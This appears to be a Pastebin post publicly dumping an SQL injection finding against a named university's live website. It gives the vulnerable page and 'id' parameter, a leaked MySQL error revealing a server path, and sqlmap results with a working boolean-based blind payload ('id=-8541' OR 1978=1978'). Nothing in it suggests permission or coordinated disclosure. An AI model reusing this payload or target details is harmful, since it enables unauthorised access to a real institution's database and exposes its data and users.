Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Bangladesh North Western University SQL Injection
- Vulnerable Site :
- nwu.edu.bd/news_details.php?id=1%27
- Vulnerable File :
- /news_details.php
- Vulnerable Parameter :
- ?id=
- SQL Database Error :
- Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean
- given in /home/nwuedu/public_html/news_details.php on line 40
- SQLMap Results
- SQLMap identified the following injection point(s) with a total of 331 HTTP(s) requests:
- ---
- Parameter: id (GET)
- Type: boolean-based blind
- Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
- Payload: id=-8541' OR 1978=1978
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement